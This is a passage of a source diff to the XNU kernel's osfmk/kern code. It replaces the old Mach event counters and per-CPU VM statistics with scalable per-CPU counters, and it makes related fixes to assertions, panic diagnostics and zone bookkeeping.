+scalable_counter_static_init(scalable_counter_t *counter) +{ + /* + * We pointed the counter to a single global value during early boot. + * Grab that value now. We'll store it in our current CPU's value + */ + uint64_t current_value = os_atomic_load_wide(zpercpu_get(*counter), relaxed); + /* + * This counter can't be freed so we allocate it out of the permanent zone rather than + * our counter zone. + */ + *counter = zalloc_percpu_permanent(sizeof(uint64_t), ZALIGN_64); + os_atomic_store_wide(zpercpu_get(*counter), current_value, relaxed); + num_static_scalable_counters++; +} + +OS_OVERLOADABLE +void +counter_alloc(scalable_counter_t *counter) +{ + *counter = zalloc_percpu(counters_zone, Z_WAITOK | Z_ZERO | Z_NOFAIL); +} + +OS_OVERLOADABLE +void +counter_alloc(atomic_counter_t *counter) +{ + os_atomic_store_wide(counter, 0, relaxed); +} + +OS_OVERLOADABLE +void +counter_free(scalable_counter_t *counter) +{ + zfree_percpu(counters_zone, *counter); +} + +OS_OVERLOADABLE +void +counter_free(atomic_counter_t *counter) +{ + (void)counter; +} + +OS_OVERLOADABLE +void +counter_add(atomic_counter_t *counter, uint64_t amount) +{ + os_atomic_add(counter, amount, relaxed); +} + +OS_OVERLOADABLE +void +counter_inc(atomic_counter_t *counter) +{ + os_atomic_inc(counter, relaxed); +} + +OS_OVERLOADABLE +void +counter_dec(atomic_counter_t *counter) +{ + os_atomic_dec(counter, relaxed); +} + +OS_OVERLOADABLE +void +counter_add_preemption_disabled(atomic_counter_t *counter, uint64_t amount) +{ + counter_add(counter, amount); +} + +OS_OVERLOADABLE +void +counter_inc_preemption_disabled(atomic_counter_t *counter) +{ + counter_inc(counter); +} + +OS_OVERLOADABLE +void +counter_dec_preemption_disabled(atomic_counter_t *counter) +{ + counter_dec(counter); +} + +OS_OVERLOADABLE +uint64_t +counter_load(atomic_counter_t *counter) +{ + return os_atomic_load_wide(counter, relaxed); +} + +OS_OVERLOADABLE +uint64_t +counter_load(scalable_counter_t *counter) +{ + uint64_t value = 0; + zpercpu_foreach(it, *counter) { + value += os_atomic_load_wide(it, relaxed); + } + return value; +} diff --git a/osfmk/kern/counters.c b/osfmk/kern/counters.c deleted file mode 100644 index 2e56e413c..000000000 --- a/osfmk/kern/counters.c +++ /dev/null @@ -1,108 +0,0 @@ -/* - * Copyright (c) 2000-2007 Apple Inc. All rights reserved. - * - * @APPLE_OSREFERENCE_LICENSE_HEADER_START@ - * - * This file contains Original Code and/or Modifications of Original Code - * as defined in and that are subject to the Apple Public Source License - * Version 2.0 (the 'License'). You may not use this file except in - * compliance with the License. The rights granted to you under the License - * may not be used to create, or enable the creation or redistribution of, - * unlawful or unlicensed copies of an Apple operating system, or to - * circumvent, violate, or enable the circumvention or violation of, any - * terms of an Apple operating system software license agreement. - * - * Please obtain a copy of the License at - * http://www.opensource.apple.com/apsl/ and read it before using this file. - * - * The Original Code and all software distributed under the License are - * distributed on an 'AS IS' basis, WITHOUT WARRANTY OF ANY KIND, EITHER - * EXPRESS OR IMPLIED, AND APPLE HEREBY DISCLAIMS ALL SUCH WARRANTIES, - * INCLUDING WITHOUT LIMITATION, ANY WARRANTIES OF MERCHANTABILITY, - * FITNESS FOR A PARTICULAR PURPOSE, QUIET ENJOYMENT OR NON-INFRINGEMENT. - * Please see the License for the specific language governing rights and - * limitations under the License. - * - * @APPLE_OSREFERENCE_LICENSE_HEADER_END@ - */ -/* - * @OSF_COPYRIGHT@ - */ -/* - * Mach Operating System - * Copyright (c) 1991,1990,1989,1988,1987 Carnegie Mellon University - * All Rights Reserved. - * - * Permission to use, copy, modify and distribute this software and its - * documentation is hereby granted, provided that both the copyright - * notice and this permission notice appear in all copies of the - * software, derivative works or modified versions, and any portions - * thereof, and that both notices appear in supporting documentation. - * - * CARNEGIE MELLON ALLOWS FREE USE OF THIS SOFTWARE IN ITS "AS IS" - * CONDITION. CARNEGIE MELLON DISCLAIMS ANY LIABILITY OF ANY KIND FOR - * ANY DAMAGES WHATSOEVER RESULTING FROM THE USE OF THIS SOFTWARE. - * - * Carnegie Mellon requests users of this software to return to - * - * Software Distribution Coordinator or Software.Distribution@CS.CMU.EDU - * School of Computer Science - * Carnegie Mellon University - * Pittsburgh PA 15213-3890 - * - * any improvements or extensions that they make and grant Carnegie Mellon - * the rights to redistribute these changes. - */ -/* - */ - -#include - -#include - -/* - * We explicitly initialize the counters to make - * them contiguous in the kernel's data space. - * This makes them easier to examine with ddb. - */ - -#if MACH_COUNTERS -mach_counter_t c_action_thread_block = 0; -mach_counter_t c_ast_taken_block = 0; -mach_counter_t c_dev_io_blocks = 0; -mach_counter_t c_dev_io_tries = 0; -mach_counter_t c_idle_thread_block = 0; -mach_counter_t c_idle_thread_handoff = 0; -mach_counter_t c_incoming_interrupts = 0; -mach_counter_t c_io_done_thread_block = 0; -mach_counter_t c_ipc_mqueue_receive_block_kernel = 0; -mach_counter_t c_ipc_mqueue_receive_block_user = 0; -mach_counter_t c_ipc_mqueue_send_block = 0; -mach_counter_t c_net_thread_block = 0; -mach_counter_t c_reaper_thread_block = 0; -mach_counter_t c_sched_thread_block = 0; -mach_counter_t c_stacks_current = 0; -mach_counter_t c_stacks_max = 0; -mach_counter_t c_stacks_min = 0; -mach_counter_t c_swtch_block = 0; -mach_counter_t c_swtch_pri_block = 0; -mach_counter_t c_syscalls_unix = 0; -mach_counter_t c_syscalls_mach = 0; -mach_counter_t c_thread_invoke_csw = 0; -mach_counter_t c_thread_invoke_hits = 0; -mach_counter_t c_thread_invoke_misses = 0; -mach_counter_t c_thread_invoke_same = 0; -mach_counter_t c_thread_invoke_same_cont = 0; -mach_counter_t c_thread_switch_block = 0; -mach_counter_t c_thread_switch_handoff = 0; -mach_counter_t c_vm_fault_page_block_backoff_kernel = 0; -mach_counter_t c_vm_fault_page_block_busy_kernel = 0; -mach_counter_t c_vm_map_simplified = 0; -mach_counter_t c_vm_map_simplify_called = 0; -mach_counter_t c_vm_map_simplify_entry_called = 0; -mach_counter_t c_vm_page_wait_block = 0; -mach_counter_t c_vm_pageout_block = 0; -mach_counter_t c_vm_pageout_scan_block = 0; -mach_counter_t c_vm_fault_retry_on_w_prot = 0; -mach_counter_t c_vm_fault_wait_on_unlock = 0; -#endif /* MACH_COUNTERS */ diff --git a/osfmk/kern/counters.h b/osfmk/kern/counters.h deleted file mode 100644 index e0f9aaea6..000000000 --- a/osfmk/kern/counters.h +++ /dev/null @@ -1,133 +0,0 @@ -/* - * Copyright (c) 2000-2007 Apple Inc. All rights reserved. - * - * @APPLE_OSREFERENCE_LICENSE_HEADER_START@ - * - * This file contains Original Code and/or Modifications of Original Code - * as defined in and that are subject to the Apple Public Source License - * Version 2.0 (the 'License'). You may not use this file except in - * compliance with the License. The rights granted to you under the License - * may not be used to create, or enable the creation or redistribution of, - * unlawful or unlicensed copies of an Apple operating system, or to - * circumvent, violate, or enable the circumvention or violation of, any - * terms of an Apple operating system software license agreement. - * - * Please obtain a copy of the License at - * http://www.opensource.apple.com/apsl/ and read it before using this file. - * - * The Original Code and all software distributed under the License are - * distributed on an 'AS IS' basis, WITHOUT WARRANTY OF ANY KIND, EITHER - * EXPRESS OR IMPLIED, AND APPLE HEREBY DISCLAIMS ALL SUCH WARRANTIES, - * INCLUDING WITHOUT LIMITATION, ANY WARRANTIES OF MERCHANTABILITY, - * FITNESS FOR A PARTICULAR PURPOSE, QUIET ENJOYMENT OR NON-INFRINGEMENT. - * Please see the License for the specific language governing rights and - * limitations under the License. - * - * @APPLE_OSREFERENCE_LICENSE_HEADER_END@ - */ -/* - * @OSF_COPYRIGHT@ - */ -/* - * Mach Operating System - * Copyright (c) 1991,1990,1989,1988,1987 Carnegie Mellon University - * All Rights Reserved. - * - * Permission to use, copy, modify and distribute this software and its - * documentation is hereby granted, provided that both the copyright - * notice and this permission notice appear in all copies of the - * software, derivative works or modified versions, and any portions - * thereof, and that both notices appear in supporting documentation. - * - * CARNEGIE MELLON ALLOWS FREE USE OF THIS SOFTWARE IN ITS "AS IS" - * CONDITION. CARNEGIE MELLON DISCLAIMS ANY LIABILITY OF ANY KIND FOR - * ANY DAMAGES WHATSOEVER RESULTING FROM THE USE OF THIS SOFTWARE. - * - * Carnegie Mellon requests users of this software to return to - * - * Software Distribution Coordinator or Software.Distribution@CS.CMU.EDU - * School of Computer Science - * Carnegie Mellon University - * Pittsburgh PA 15213-3890 - * - * any improvements or extensions that they make and grant Carnegie Mellon - * the rights to redistribute these changes. - */ -/* - */ - -#ifndef _KERN_COUNTERS_ -#define _KERN_COUNTERS_ - -#include - -/* - * We can count various interesting events and paths. - * - * Use counter() to change the counters, eg: - * counter(c_idle_thread_block++); - * Use counter_always() for non-conditional counters. - */ - -#define counter_always(code) code - -#if MACH_COUNTERS - -#define counter(code) counter_always(code) - -#else /* MACH_COUNTERS */ - -#define counter(code) - -#endif /* MACH_COUNTERS */ - -/* - * We define the counters with individual integers, - * instead of a big structure, so that ddb - * will know the addresses of the counters. - */ - -typedef unsigned int mach_counter_t; - -#if MACH_COUNTERS -extern mach_counter_t c_action_thread_block; -extern mach_counter_t c_ast_taken_block; -extern mach_counter_t c_dev_io_blocks; -extern mach_counter_t c_dev_io_tries; -extern mach_counter_t c_idle_thread_block; -extern mach_counter_t c_idle_thread_handoff; -extern mach_counter_t c_incoming_interrupts; -extern mach_counter_t c_io_done_thread_block; -extern mach_counter_t c_ipc_mqueue_receive_block_kernel; -extern mach_counter_t c_ipc_mqueue_receive_block_user; -extern mach_counter_t c_ipc_mqueue_send_block; -extern mach_counter_t c_net_thread_block; -extern mach_counter_t c_reaper_thread_block; -extern mach_counter_t c_sched_thread_block; -extern mach_counter_t c_stacks_current; -extern mach_counter_t c_stacks_max; -extern mach_counter_t c_stacks_min; -extern mach_counter_t c_swtch_block; -extern mach_counter_t c_swtch_pri_block; -extern mach_counter_t c_syscalls_unix; -extern mach_counter_t c_syscalls_mach; -extern mach_counter_t c_thread_invoke_csw; -extern mach_counter_t c_thread_invoke_same; -extern mach_counter_t c_thread_invoke_same_cont; -extern mach_counter_t c_thread_invoke_misses; -extern mach_counter_t c_thread_invoke_hits; -extern mach_counter_t c_thread_switch_block; -extern mach_counter_t c_thread_switch_handoff; -extern mach_counter_t c_vm_fault_page_block_backoff_kernel; -extern mach_counter_t c_vm_fault_page_block_busy_kernel; -extern mach_counter_t c_vm_fault_retry_on_w_prot; -extern mach_counter_t c_vm_fault_wait_on_unlock; -extern mach_counter_t c_vm_map_simplified; -extern mach_counter_t c_vm_map_simplify_called; -extern mach_counter_t c_vm_map_simplify_entry_called; -extern mach_counter_t c_vm_page_wait_block; -extern mach_counter_t c_vm_pageout_block; -extern mach_counter_t c_vm_pageout_scan_block; -#endif /* MACH_COUNTERS */ - -#endif /* _KERN_COUNTERS_ */ diff --git a/osfmk/kern/cpu_quiesce.c b/osfmk/kern/cpu_quiesce.c index 2ca5f67f0..7c613b5c6 100644 --- a/osfmk/kern/cpu_quiesce.c +++ b/osfmk/kern/cpu_quiesce.c @@ -90,16 +90,17 @@ static uint64_t cpu_checkin_min_interval; static uint32_t cpu_checkin_min_interval_us; #if __LP64__ -static_assert(MAX_CPUS <= 32); -#define CPU_CHECKIN_MASK 0x5555555555555555UL -#define CPU_EXPECTED_MASK (~CPU_CHECKIN_MASK) +#define CPU_CHECKIN_MASK_MAX_CPUS 32 +#define CPU_CHECKIN_MASK 0x5555555555555555UL +#define CPU_EXPECTED_MASK (~CPU_CHECKIN_MASK) #else /* Avoid double-wide CAS on 32-bit platforms by using a 32-bit state and mask */ -static_assert(MAX_CPUS <= 16); -#define CPU_CHECKIN_MASK 0x55555555UL -#define CPU_EXPECTED_MASK (~CPU_CHECKIN_MASK) +#define CPU_CHECKIN_MASK_MAX_CPUS 16 +#define CPU_CHECKIN_MASK 0x55555555UL +#define CPU_EXPECTED_MASK (~CPU_CHECKIN_MASK) #endif +static_assert(MAX_CPUS <= CPU_CHECKIN_MASK_MAX_CPUS); static_assert(CPU_CHECKIN_MASK == CPU_EXPECTED_MASK >> 1); static inline checkin_mask_t @@ -117,10 +118,10 @@ cpu_expected_bit(int cpuid) void cpu_quiescent_counter_init(void) { - assert(CPU_CHECKIN_MASK & cpu_checked_in_bit(MAX_CPUS)); - assert(CPU_EXPECTED_MASK & cpu_expected_bit(MAX_CPUS)); - assert((CPU_CHECKIN_MASK & cpu_expected_bit(MAX_CPUS)) == 0); - assert((CPU_EXPECTED_MASK & cpu_checked_in_bit(MAX_CPUS)) == 0); + assert(CPU_CHECKIN_MASK & cpu_checked_in_bit(MAX_CPUS - 1)); + assert(CPU_EXPECTED_MASK & cpu_expected_bit(MAX_CPUS - 1)); + assert((CPU_CHECKIN_MASK & cpu_expected_bit(MAX_CPUS - 1)) == 0); + assert((CPU_EXPECTED_MASK & cpu_checked_in_bit(MAX_CPUS - 1)) == 0); cpu_quiescent_counter_set_min_interval_us(CPU_CHECKIN_MIN_INTERVAL_US); } @@ -192,6 +193,7 @@ cpu_quiescent_counter_join(__unused uint64_t ctime) struct cpu_quiesce *st = PERCPU_GET(cpu_quiesce); __assert_only int cpuid = cpu_number(); + assert(cpuid < MAX_CPUS); assert(st->state == CPU_QUIESCE_COUNTER_NONE || st->state == CPU_QUIESCE_COUNTER_LEFT); diff --git a/osfmk/kern/debug.c b/osfmk/kern/debug.c index 0cb5ea810..fcb23e1f7 100644 --- a/osfmk/kern/debug.c +++ b/osfmk/kern/debug.c @@ -1058,7 +1058,7 @@ debugger_collect_diagnostics(unsigned int exception, unsigned int code, unsigned * conventional sense. */ if (debugger_current_op == DBOP_PANIC || ((debugger_current_op == DBOP_DEBUGGER) && debugger_is_panic)) -#endif +#endif /* __x86_64__ */ { kdp_callouts(KDP_EVENT_PANICLOG); @@ -1075,6 +1075,7 @@ debugger_collect_diagnostics(unsigned int exception, unsigned int code, unsigned /* DEBUGGER_OPTION_PANICLOGANDREBOOT is used for two finger resets on embedded so we get a paniclog */ if (debugger_panic_options & DEBUGGER_OPTION_PANICLOGANDREBOOT) { + PEHaltRestart(kPEPanicDiagnosticsDone); PEHaltRestart(kPEPanicRestartCPUNoCallouts); } } @@ -1087,6 +1088,7 @@ debugger_collect_diagnostics(unsigned int exception, unsigned int code, unsigned */ if ((debugger_panic_options & DEBUGGER_OPTION_SKIP_LOCAL_COREDUMP) && (debug_boot_arg & DB_REBOOT_POST_CORE)) { + PEHaltRestart(kPEPanicDiagnosticsDone); kdp_machine_reboot_type(kPEPanicRestartCPU, debugger_panic_options); } @@ -1097,7 +1099,7 @@ debugger_collect_diagnostics(unsigned int exception, unsigned int code, unsigned if (on_device_corefile_enabled()) { if (!kdp_has_polled_corefile()) { if (debug_boot_arg & (DB_KERN_DUMP_ON_PANIC | DB_KERN_DUMP_ON_NMI)) { - paniclog_append_noflush("skipping local kernel core because core file could not be opened prior to panic (error : 0x%x)", + paniclog_append_noflush("skipping local kernel core because core file could not be opened prior to panic (error : 0x%x)\n", kdp_polled_corefile_error()); #if defined(__arm__) || defined(__arm64__) panic_info->eph_panic_flags |= EMBEDDED_PANIC_HEADER_FLAG_COREDUMP_FAILED; @@ -1112,7 +1114,7 @@ debugger_collect_diagnostics(unsigned int exception, unsigned int code, unsigned } #if XNU_MONITOR else if ((pmap_get_cpu_data()->ppl_state == PPL_STATE_PANIC) && (debug_boot_arg & (DB_KERN_DUMP_ON_PANIC | DB_KERN_DUMP_ON_NMI))) { - paniclog_append_noflush("skipping local kernel core because the PPL is in PANIC state"); + paniclog_append_noflush("skipping local kernel core because the PPL is in PANIC state\n"); panic_info->eph_panic_flags |= EMBEDDED_PANIC_HEADER_FLAG_COREDUMP_FAILED; paniclog_flush(); } @@ -1145,11 +1147,17 @@ debugger_collect_diagnostics(unsigned int exception, unsigned int code, unsigned */ if ((debug_boot_arg & DB_REBOOT_POST_CORE) && ((ret == 0) || (debugger_panic_options & DEBUGGER_OPTION_ATTEMPTCOREDUMPANDREBOOT))) { + PEHaltRestart(kPEPanicDiagnosticsDone); kdp_machine_reboot_type(kPEPanicRestartCPU, debugger_panic_options); } } } + if (debugger_current_op == DBOP_PANIC || + ((debugger_current_op == DBOP_DEBUGGER) && debugger_is_panic)) { + PEHaltRestart(kPEPanicDiagnosticsDone); + } + if (debug_boot_arg & DB_REBOOT_ALWAYS) { kdp_machine_reboot_type(kPEPanicRestartCPU, debugger_panic_options); } @@ -1179,6 +1187,11 @@ debugger_collect_diagnostics(unsigned int exception, unsigned int code, unsigned panic_spin_shmcon(); } #endif /* defined(__arm__) || defined(__arm64__) */ + +#else /* CONFIG_KDP_INTERACTIVE_DEBUGGING */ + + PEHaltRestart(kPEPanicDiagnosticsDone); + #endif /* CONFIG_KDP_INTERACTIVE_DEBUGGING */ if (!panicDebugging) { @@ -1565,10 +1578,6 @@ extern unsigned int inuse_ptepages_count; extern long long alloc_ptepages_count; #endif -extern boolean_t panic_include_zprint; -extern mach_memory_info_t *panic_kext_memory_info; -extern vm_size_t panic_kext_memory_size; - __private_extern__ void panic_display_zprint(void) { @@ -1579,10 +1588,10 @@ panic_display_zprint(void) zone_index_foreach(i) { if (ml_nofault_copy((vm_offset_t)&zone_array[i], (vm_offset_t)&zone_copy, sizeof(struct zone)) == sizeof(struct zone)) { - if (zone_copy.page_count > atop(1024 * 1024)) { + if (zone_copy.z_wired_cur > atop(1024 * 1024)) { paniclog_append_noflush("%-8s%-20s %10llu %10lu\n", zone_heap_name(&zone_copy), - zone_copy.z_name, ptoa_64(zone_copy.page_count), + zone_copy.z_name, (uint64_t)zone_size_wired(&zone_copy), (uintptr_t)zone_size_free(&zone_copy)); } } @@ -1623,8 +1632,6 @@ panic_display_ecc_errors(void) #endif /* CONFIG_ECC_LOGGING */ #if CONFIG_ZLEAKS -extern boolean_t panic_include_ztrace; -extern struct ztrace* top_ztrace; void panic_print_symbol_name(vm_address_t search); /* diff --git a/osfmk/kern/debug.h b/osfmk/kern/debug.h index fe3d5eed2..c9550cfd7 100644 --- a/osfmk/kern/debug.h +++ b/osfmk/kern/debug.h @@ -286,6 +286,7 @@ __options_decl(microstackshot_flags_t, uint32_t, { #define KF_INTERRUPT_MASKED_DEBUG_OVRD (0x40) #define KF_TRAPTRACE_OVRD (0x80) #define KF_IOTRACE_OVRD (0x100) +#define KF_INTERRUPT_MASKED_DEBUG_STACKSHOT_OVRD (0x200) boolean_t kern_feature_override(uint32_t fmask); diff --git a/osfmk/kern/exception.c b/osfmk/kern/exception.c index 91c688db5..2060dc2a1 100644 --- a/osfmk/kern/exception.c +++ b/osfmk/kern/exception.c @@ -76,7 +76,6 @@ #include #include -#include #include #include #include diff --git a/osfmk/kern/gzalloc.c b/osfmk/kern/gzalloc.c index ff7dec6bc..54ec12be2 100644 --- a/osfmk/kern/gzalloc.c +++ b/osfmk/kern/gzalloc.c @@ -204,11 +204,11 @@ gzalloc_empty_free_cache(zone_t zone) } /* Reset gzalloc_data. */ - lock_zone(zone); + zone_lock(zone); memcpy((void *)gzfc_copy, (void *)zone->gz.gzfc, gzfcsz); bzero((void *)zone->gz.gzfc, gzfcsz); zone->gz.gzfc_index = 0; - unlock_zone(zone); + zone_unlock(zone); /* Free up all the cached elements. */ for (uint32_t index = 0; index < gzfc_size; index++) { @@ -233,10 +233,10 @@ gzalloc_empty_free_cache(zone_t zone) */ /* Decrement zone counters. */ - lock_zone(zone); - zone->countfree += freed_elements; - zone->page_count -= freed_elements; - unlock_zone(zone); + zone_lock(zone); + zone->z_elems_free += freed_elements; + zone->z_wired_cur -= freed_elements; + zone_unlock(zone); kmem_free(kernel_map, gzfc_copy, gzfcsz); } @@ -357,6 +357,7 @@ gzalloc_alloc(zone_t zone, zone_stats_t zstats, zalloc_flags_t flags) vm_offset_t residue = rounded_size - zone_elem_size(zone); vm_offset_t gzaddr = 0; gzhdr_t *gzh, *gzhcopy = NULL; + bool new_va = false; if (!kmem_ready || (vm_page_zone == ZONE_NULL)) { /* Early allocations are supplied directly from the @@ -381,6 +382,7 @@ gzalloc_alloc(zone_t zone, zone_stats_t zstats, zalloc_flags_t flags) panic("gzalloc: kernel_memory_allocate for size 0x%llx failed with %d", (uint64_t)rounded_size, kr); } + new_va = true; } if (gzalloc_uf_mode) { @@ -396,7 +398,7 @@ gzalloc_alloc(zone_t zone, zone_stats_t zstats, zalloc_flags_t flags) addr = (gzaddr + residue); } - if (zone->zfree_clear_mem) { + if (zone->z_free_zeroes) { bzero((void *)gzaddr, rounded_size); } else { /* Fill with a pattern on allocation to trap uninitialized @@ -424,15 +426,15 @@ gzalloc_alloc(zone_t zone, zone_stats_t zstats, zalloc_flags_t flags) *gzhcopy = *gzh; } - lock_zone(zone); + zone_lock(zone); assert(zone->z_self == zone); - zone->countfree--; - zone->page_count += 1; + zone->z_elems_free--; + if (new_va) { + zone->z_va_cur += 1; + } + zone->z_wired_cur += 1; zpercpu_get(zstats)->zs_mem_allocated += rounded_size; -#if ZALLOC_DETAILED_STATS - zpercpu_get(zstats)->zs_mem_wasted += rounded_size - zone_elem_size(zone); -#endif /* ZALLOC_DETAILED_STATS */ - unlock_zone(zone); + zone_unlock(zone); OSAddAtomic64((SInt32) rounded_size, &gzalloc_allocated); OSAddAtomic64((SInt32) (rounded_size - zone_elem_size(zone)), &gzalloc_wasted); @@ -468,7 +470,7 @@ gzalloc_free(zone_t zone, zone_stats_t zstats, void *addr) } if (gzfc_size && gzalloc_dfree_check) { - lock_zone(zone); + zone_lock(zone); assert(zone->z_self == zone); for (uint32_t gd = 0; gd < gzfc_size; gd++) { if (zone->gz.gzfc[gd] != saddr) { @@ -478,7 +480,7 @@ gzalloc_free(zone_t zone, zone_stats_t zstats, void *addr) "current free cache index: %d, freed index: %d", __func__, saddr, zone->gz.gzfc_index, gd); } - unlock_zone(zone); + zone_unlock(zone); } if (gzalloc_consistency_checks) { @@ -549,7 +551,7 @@ gzalloc_free(zone_t zone, zone_stats_t zstats, void *addr) free_addr = saddr; } - lock_zone(zone); + zone_lock(zone); assert(zone->z_self == zone); /* Insert newly freed element into the protected free element @@ -564,12 +566,12 @@ gzalloc_free(zone_t zone, zone_stats_t zstats, void *addr) } if (free_addr) { - zone->countfree++; - zone->page_count -= 1; + zone->z_elems_free++; + zone->z_wired_cur -= 1; } zpercpu_get(zstats)->zs_mem_freed += rounded_size; - unlock_zone(zone); + zone_unlock(zone); if (free_addr) { // TODO: consider using physical reads to check for diff --git a/osfmk/kern/host.c b/osfmk/kern/host.c index 5b60219f7..12a061aa5 100644 --- a/osfmk/kern/host.c +++ b/osfmk/kern/host.c @@ -109,11 +109,40 @@ #include -vm_statistics64_data_t PERCPU_DATA(vm_stat); -uint64_t PERCPU_DATA(vm_page_grab_count); +SCALABLE_COUNTER_DEFINE(vm_statistics_zero_fill_count); /* # of zero fill pages */ +SCALABLE_COUNTER_DEFINE(vm_statistics_reactivations); /* # of pages reactivated */ +SCALABLE_COUNTER_DEFINE(vm_statistics_pageins); /* # of pageins */ +SCALABLE_COUNTER_DEFINE(vm_statistics_pageouts); /* # of pageouts */ +SCALABLE_COUNTER_DEFINE(vm_statistics_faults); /* # of faults */ +SCALABLE_COUNTER_DEFINE(vm_statistics_cow_faults); /* # of copy-on-writes */ +SCALABLE_COUNTER_DEFINE(vm_statistics_lookups); /* object cache lookups */ +SCALABLE_COUNTER_DEFINE(vm_statistics_hits); /* object cache hits */ +SCALABLE_COUNTER_DEFINE(vm_statistics_purges); /* # of pages purged */ +SCALABLE_COUNTER_DEFINE(vm_statistics_decompressions); /* # of pages decompressed */ +SCALABLE_COUNTER_DEFINE(vm_statistics_compressions); /* # of pages compressed */ +SCALABLE_COUNTER_DEFINE(vm_statistics_swapins); /* # of pages swapped in (via compression segments) */ +SCALABLE_COUNTER_DEFINE(vm_statistics_swapouts); /* # of pages swapped out (via compression segments) */ +SCALABLE_COUNTER_DEFINE(vm_statistics_total_uncompressed_pages_in_compressor); /* # of pages (uncompressed) held within the compressor. */ +SCALABLE_COUNTER_DEFINE(vm_page_grab_count); host_data_t realhost; +static void +get_host_vm_stats(vm_statistics64_t out) +{ + out->zero_fill_count = counter_load(&vm_statistics_zero_fill_count); + out->reactivations = counter_load(&vm_statistics_reactivations); + out->pageins = counter_load(&vm_statistics_pageins); + out->pageouts = counter_load(&vm_statistics_pageouts); + out->faults = counter_load(&vm_statistics_faults); + out->cow_faults = counter_load(&vm_statistics_cow_faults); + out->lookups = counter_load(&vm_statistics_lookups); + out->hits = counter_load(&vm_statistics_hits); + out->compressions = counter_load(&vm_statistics_compressions); + out->decompressions = counter_load(&vm_statistics_decompressions); + out->swapins = counter_load(&vm_statistics_swapins); + out->swapouts = counter_load(&vm_statistics_swapouts); +} vm_extmod_statistics_data_t host_extmod_statistics; kern_return_t @@ -123,8 +152,6 @@ host_processors(host_priv_t host_priv, processor_array_t * out_array, mach_msg_t return KERN_INVALID_ARGUMENT; } - assert(host_priv == &realhost); - unsigned int count = processor_count; assert(count != 0); @@ -402,19 +429,7 @@ host_statistics(host_t host, host_flavor_t flavor, host_info_t info, mach_msg_ty return KERN_FAILURE; } - host_vm_stat = *PERCPU_GET_MASTER(vm_stat); - - percpu_foreach_secondary(stat, vm_stat) { - vm_statistics64_data_t data = *stat; - host_vm_stat.zero_fill_count += data.zero_fill_count; - host_vm_stat.reactivations += data.reactivations; - host_vm_stat.pageins += data.pageins; - host_vm_stat.pageouts += data.pageouts; - host_vm_stat.faults += data.faults; - host_vm_stat.cow_faults += data.cow_faults; - host_vm_stat.lookups += data.lookups; - host_vm_stat.hits += data.hits; - } + get_host_vm_stats(&host_vm_stat); stat32 = (vm_statistics_t)info; @@ -427,11 +442,11 @@ host_statistics(host_t host, host_flavor_t flavor, host_info_t info, mach_msg_ty } } stat32->inactive_count = VM_STATISTICS_TRUNCATE_TO_32_BIT(vm_page_inactive_count); -#if CONFIG_EMBEDDED +#if !XNU_TARGET_OS_OSX stat32->wire_count = VM_STATISTICS_TRUNCATE_TO_32_BIT(vm_page_wire_count); -#else +#else /* !XNU_TARGET_OS_OSX */ stat32->wire_count = VM_STATISTICS_TRUNCATE_TO_32_BIT(vm_page_wire_count + vm_page_throttled_count + vm_lopage_free_count); -#endif +#endif /* !XNU_TARGET_OS_OSX */ stat32->zero_fill_count = VM_STATISTICS_TRUNCATE_TO_32_BIT(host_vm_stat.zero_fill_count); stat32->reactivations = VM_STATISTICS_TRUNCATE_TO_32_BIT(host_vm_stat.reactivations); stat32->pageins = VM_STATISTICS_TRUNCATE_TO_32_BIT(host_vm_stat.pageins); @@ -793,24 +808,7 @@ vm_stats(void *info, unsigned int *count) if (*count < HOST_VM_INFO64_REV0_COUNT) { return KERN_FAILURE; } - - host_vm_stat = *PERCPU_GET_MASTER(vm_stat); - - percpu_foreach_secondary(stat, vm_stat) { - vm_statistics64_data_t data = *stat; - host_vm_stat.zero_fill_count += data.zero_fill_count; - host_vm_stat.reactivations += data.reactivations; - host_vm_stat.pageins += data.pageins; - host_vm_stat.pageouts += data.pageouts; - host_vm_stat.faults += data.faults; - host_vm_stat.cow_faults += data.cow_faults; - host_vm_stat.lookups += data.lookups; - host_vm_stat.hits += data.hits; - host_vm_stat.compressions += data.compressions; - host_vm_stat.decompressions += data.decompressions; - host_vm_stat.swapins += data.swapins; - host_vm_stat.swapouts += data.swapouts; - } + get_host_vm_stats(&host_vm_stat); vm_statistics64_t stat = (vm_statistics64_t)info; @@ -827,11 +825,11 @@ vm_stats(void *info, unsigned int *count) } } stat->inactive_count = vm_page_inactive_count; -#if CONFIG_EMBEDDED +#if !XNU_TARGET_OS_OSX stat->wire_count = vm_page_wire_count; -#else +#else /* !XNU_TARGET_OS_OSX */ stat->wire_count = vm_page_wire_count + vm_page_throttled_count + vm_lopage_free_count; -#endif +#endif /* !XNU_TARGET_OS_OSX */ stat->zero_fill_count = host_vm_stat.zero_fill_count; stat->reactivations = host_vm_stat.reactivations; stat->pageins = host_vm_stat.pageins; @@ -981,20 +979,6 @@ set_sched_stats_active(boolean_t active) return KERN_SUCCESS; } - -uint64_t -get_pages_grabbed_count(void) -{ - uint64_t pages_grabbed_count = 0; - - percpu_foreach(count, vm_page_grab_count) { - pages_grabbed_count += *count; - } - - return pages_grabbed_count; -} - - kern_return_t get_sched_statistics(struct _processor_statistics_np * out, uint32_t * count) { @@ -1290,6 +1274,10 @@ host_set_special_port_from_user(host_priv_t host_priv, int id, ipc_port_t port) return KERN_NO_ACCESS; } + if (IP_VALID(port) && (port->ip_immovable_receive || port->ip_immovable_send)) { + return KERN_INVALID_RIGHT; + } + return host_set_special_port(host_priv, id, port); } @@ -1415,8 +1403,6 @@ host_set_multiuser_config_flags(host_priv_t host_priv, uint32_t multiuser_config return KERN_INVALID_ARGUMENT; } - assert(host_priv == &realhost); - /* * Always enforce that the multiuser bit is set * if a value is written to the commpage word. diff --git a/osfmk/kern/host_statistics.h b/osfmk/kern/host_statistics.h index 9d21a4a4c..d6e12f31f 100644 --- a/osfmk/kern/host_statistics.h +++ b/osfmk/kern/host_statistics.h @@ -38,25 +38,23 @@ #ifndef _KERN_HOST_STATISTICS_H_ #define _KERN_HOST_STATISTICS_H_ -#include -#include -#include -#include +#include -extern -uint64_t get_pages_grabbed_count(void); +SCALABLE_COUNTER_DECLARE(vm_statistics_zero_fill_count); /* # of zero fill pages */ +SCALABLE_COUNTER_DECLARE(vm_statistics_reactivations); /* # of pages reactivated */ +SCALABLE_COUNTER_DECLARE(vm_statistics_pageins); /* # of pageins */ +SCALABLE_COUNTER_DECLARE(vm_statistics_pageouts); /* # of pageouts */ +SCALABLE_COUNTER_DECLARE(vm_statistics_faults); /* # of faults */ +SCALABLE_COUNTER_DECLARE(vm_statistics_cow_faults); /* # of copy-on-writes */ +SCALABLE_COUNTER_DECLARE(vm_statistics_lookups); /* object cache lookups */ 